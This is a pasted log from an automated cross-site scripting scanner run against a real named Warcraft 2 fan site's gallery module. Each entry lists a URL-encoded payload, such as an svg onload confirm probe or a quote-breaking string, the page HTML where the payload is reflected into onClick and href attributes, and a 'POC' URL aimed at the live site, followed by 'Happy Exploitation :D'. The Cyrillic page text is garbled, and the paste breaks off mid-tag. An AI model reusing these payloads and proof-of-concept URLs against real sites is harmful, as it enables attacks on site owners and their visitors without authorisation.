API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 17th, 2017
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.74 KB | None | 0 0
raw download clone embed print report
  1. [!] Please wait ....
  2. [*] Payload Found . . .
  3. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  4. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3'>zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3'>zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5900</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  5. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  6. [*] Happy Exploitation :D
  7. [*] Payload Found . . .
  8. [*] Payload: %78%22%78%3e%78
  9. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3x"x>x&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3x"x>x&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5901</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  10. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%78%22%78%3e%78&min=0&orderby=titreA&show=
  11. [*] Happy Exploitation :D
  12. [*] Payload Found . . .
  13. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  14. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3">zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3">zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5902</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  15. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  16. [*] Happy Exploitation :D
  17. [*] Payload Found . . .
  18. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  19. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5903</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  20. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  21. [*] Happy Exploitation :D
  22. [*] Payload Found . . .
  23. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  24. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5904</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  25. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  26. [*] Happy Exploitation :D
  27. [*] Payload Found . . .
  28. [*] Payload: %78%22%78%3e%78
  29. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0x"x>x&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0x"x>x&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0x"x>x&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5905</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  30. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%78%22%78%3e%78&orderby=titreA&show=
  31. [*] Happy Exploitation :D
  32. [*] Payload Found . . .
  33. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  34. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5906</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  35. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  36. [*] Happy Exploitation :D
  37. [*] Payload Found . . .
  38. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  39. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5907</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  40. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  41. [*] Happy Exploitation :D
  42. [*] Payload Found . . .
  43. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  44. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5908</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  45. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  46. [*] Happy Exploitation :D
  47. [*] Payload Found . . .
  48. [*] Payload: %78%22%78%3e%78
  49. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreAx"x>x&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreAx"x>x&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreAx"x>x&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreAx"x>x&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a 